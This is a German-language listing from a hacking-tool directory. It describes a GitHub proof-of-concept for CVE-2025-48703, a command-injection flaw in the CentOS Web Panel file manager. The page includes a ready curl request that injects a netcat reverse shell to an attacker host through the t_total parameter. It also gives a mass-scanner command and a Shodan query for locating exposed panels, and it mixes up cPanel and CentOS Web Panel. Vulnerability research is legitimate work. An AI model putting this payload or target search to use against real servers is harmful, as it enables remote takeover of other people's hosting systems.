Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-48703 — Remote-Codeausführung im CentOS-Webpanel | Kitploit
Tools/GitHubGitHub/skynoxk/cve-2025-48703
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlPayload-Entwicklung
GitHubskynoxk/cve-2025-48703

CVE-2025-48703

Remote-Codeausführung im CentOS-Webpanel

Repository anzeigen
31vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🛡️ CVE-2025-48703 - Remote Code Execution (RCE) im cPanel Dateimanager

📌 Beschreibung

CVE-2025-48703 ist eine Remote Code Execution (RCE)-Sicherheitslücke im filemanager-Modul eines Webhosting-Kontrollpanels (z.B. cPanel). Sie tritt aufgrund einer nicht bereinigten Eingabeverarbeitung in der acc=changePerm-Funktion auf, die es einem Angreifer ermöglicht, beliebige Systembefehle über den Parameter t_total einzuschleusen und auszuführen.


🧨 Auswirkungen

Diese Sicherheitslücke ermöglicht Angreifern:

  • Ausführen beliebiger Befehle auf dem Zielserver.
  • Einrichten einer Reverse-Shell für dauerhaften Zugriff.
  • Potenziell Rechteausweitung oder laterale Bewegung.

⚠️ Dieser Angriff kann mit minimaler Authentifizierung oder in einigen Konfigurationen ohne Authentifizierung durchgeführt werden.


🚀 Proof-of-Concept (PoC)

✅ Reverse-Shell-Befehl

root@kitploit:~
curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
  --data 'fileName=.bashrc&currentPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'

Verwendung des Scanners

root@kitploit:~
python3 Scanner.py  #Make sure targets.txt is in the same dir

Shodan-Suche

root@kitploit:~
Server: cwpsrv

Referenz: https://fenrisk.com/rce-centos-webpanel

Tool herunterladen